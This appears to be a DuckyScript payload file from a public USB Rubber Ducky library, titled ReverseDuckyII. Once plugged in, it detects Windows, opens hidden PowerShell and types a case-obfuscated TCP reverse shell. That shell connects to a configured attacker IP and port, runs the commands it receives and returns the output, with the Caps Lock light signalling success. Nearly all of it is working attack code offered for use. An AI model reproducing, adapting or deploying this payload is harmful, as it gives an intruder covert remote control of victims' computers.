Path: blob/master/payloads/library/remote_access/ReverseDuckyII/ReverseDuckyII.txt
2964 views
REM ReverseDuckyII1REM Version 2.02REM OS: Windows / Multi3REM Author: 0i41E4REM Requirement: DuckyScript 3.056REM TCP Reverse shell executed hidden in the background, the CAPSLOCK light at the end will indicate that the payload was executed.7REM If inserted into a non Windows machine, the Ducky will appear broken.8REM DON'T FORGET TO START LISTENER910REM PASSIVE_WINDOWS_DETECT extension, made by Korben, to indentify the OS11EXTENSION PASSIVE_WINDOWS_DETECT12REM VERSION 1.01314REM Windows fully passive OS Detection and passive Detect Ready15REM Includes its own passive detect ready. Does not require16REM additional extensions1718REM USAGE:19REM Extension runs inline (here)20REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic21REM boot delay22REM $_OS will be set to WINDOWS or NOT_WINDOWS2324REM CONFIGURATION:25DEFINE MAX_WAIT 15026DEFINE CHECK_INTERVAL 2027DEFINE WINDOWS_HOST_REQUEST_COUNT 228DEFINE NOT_WINDOWS 72930VAR $MAX_TRIES = MAX_WAIT31WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))32DELAY CHECK_INTERVAL33$MAX_TRIES = ($MAX_TRIES - 1)34END_WHILE35IF ($_HOST_CONFIGURATION_REQUEST_COUNT > WINDOWS_HOST_REQUEST_COUNT) THEN36$_OS = WINDOWS37ELSE38$_OS = NOT_WINDOWS39END_IF4041REM EXAMPLE USAGE AFTER EXTENSION42REM IF ($_OS == WINDOWS) THEN43REM STRING HELLO WINDOWS!44REM ELSE45REM STRING HELLO WORLD!46REM END_IF47END_EXTENSION4849REM Configure your settings below:50REM Insert the attacking IP between '' & define your port51DEFINE ATTACKER '192.168.178.25'52DEFINE PORT 444453REM Set the default DELAY54DEFINE WAIT 5005556IF ($_OS == WINDOWS) THEN57DELAY 150058GUI r59DELAY WAIT60STRINGLN powershell -NoP -NonI -w h61DELAY WAIT62STRINGLN $c=nEw-oBjECt SYstEm.NEt.SOcKEts.TCPClIEnt( ATTACKER , PORT );$s=$c.GetSTreAm();[byte[]]$b=0..65535|%{0};whILe(($i=$s.REad($b,0,$b.LeNgTh))-ne 0){;$d=(NEw-OBjeCT -TYpeNamE sYsTeM.TeXt.ASCIIEncoding).GetStRIng($b,0,$i);$z=(ieX $d 2>&1|oUt-STriNG);$x=$z+"Ducky@PS "+(pwd)+"> ";$y=([text.encoding]::ASCII).GEtByTEs($x);$s.WrIte($y,0,$y.LEnGTh);$s.FlUSh()};$c.CloSE();exit63REM Capslock light will indicate a finished payload64CAPSLOCK65ELSE66REM Inserting the Ducky into a non Windows machine will result in ATTACKMODE OFF67ATTACKMODE OFF68END_IF6970717273